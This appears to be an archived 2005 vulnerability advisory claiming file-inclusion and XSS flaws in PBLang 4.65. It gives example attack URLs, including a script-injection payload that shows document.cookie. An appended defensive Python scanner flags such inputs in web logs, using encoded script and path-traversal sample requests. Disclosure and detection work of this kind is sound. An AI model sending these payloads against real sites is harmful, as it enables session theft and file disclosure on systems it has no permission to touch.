Computer Security
[EN] securityvulns.ru

From: abducter_minds_(at)_yahoo.com <abducter_minds_(at)_yahoo.com>
Date: 29.10.2005
Subject: File Including In PBLang


Class:  Input Validation Error  
CVE:  CVE-MAP-NOMATCH  
Remote:  Yes  
Local:  Yes  
Credit:  Abducter (ABDUCTER_MINDS@YAHOO.COM) Or (ABDUCTER_MINDS76@HOTMAIL.COM)
Vulnerable:  File Including In PBLang 4.65 (ALL VERSIONS)
* info *
PBLang IS POWER PHP SITES SUPPORT HERE
http://pblang.drmartinus.de/

* exploit *
http://www.victim.com/profile.php?u=[abducter here]
http://www.victim.com/pmpshow.php?num=[abducter here]
http://www.victim.com/delpm.php?id=[abducter here]

You can do XSS in any exploit like this:
http://www.victim.com/pmpshow.php?num=<script>JavaScript:
alert(document.cookie);</script>

* credit *
        Devil-00
        Security4Arab .. A'Where Home .. WE LOVE S4A FOR EVER :P
        HACKERS PAL ..
        WwW.S4a.Cc
        MY LOVE (N0N0)
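
For defenders reviewing web server logs, the following added example (not part of the original advisory and not PBLang code) flags requests to the three script/parameter pairs listed above whose values fall outside a conservative allowlist. The allowlist pattern, the combined-log request format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script -> parameter pairs named in the advisory.
WATCHED = {"profile.php": "u", "pmpshow.php": "num", "delpm.php": "id"}

# Assumption: legitimate values are short identifiers or numbers.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_-]{1,64}")

# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify(value):
    """Return a reason string if the value looks unsafe, else None."""
    if SAFE_VALUE.fullmatch(value):
        return None
    if "<" in value or ">" in value:
        return "markup"
    if "/" in value or "\\" in value or ".." in value or "\x00" in value:
        return "path"
    return "other"


def scan(lines):
    """Return (line_no, script, param, reason) for each suspicious request."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        script = url.path.rsplit("/", 1)[-1].lower()
        param = WATCHED.get(script)
        if param is None:
            continue
        # parse_qs percent-decodes, so encoded values are checked in clear.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            reason = classify(value)
            if reason:
                findings.append((no, script, param, reason))
    return findings


# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '192.0.2.10 - - [29/Oct/2005:10:00:01 +0000] "GET /forum/profile.php?u=alice HTTP/1.1" 200 5120',
    '192.0.2.11 - - [29/Oct/2005:10:00:07 +0000] "GET /forum/pmpshow.php?num=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 911',
    '192.0.2.11 - - [29/Oct/2005:10:00:09 +0000] "GET /forum/delpm.php?id=..%2F..%2Fexample HTTP/1.1" 200 0',
    '192.0.2.12 - - [29/Oct/2005:10:00:15 +0000] "GET /forum/delpm.php?id=42 HTTP/1.1" 302 0',
]
```

Calling `scan(SAMPLE)` reports lines 2 and 3; tighten `SAFE_VALUE` per parameter once the real value formats on a given installation are known.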
      
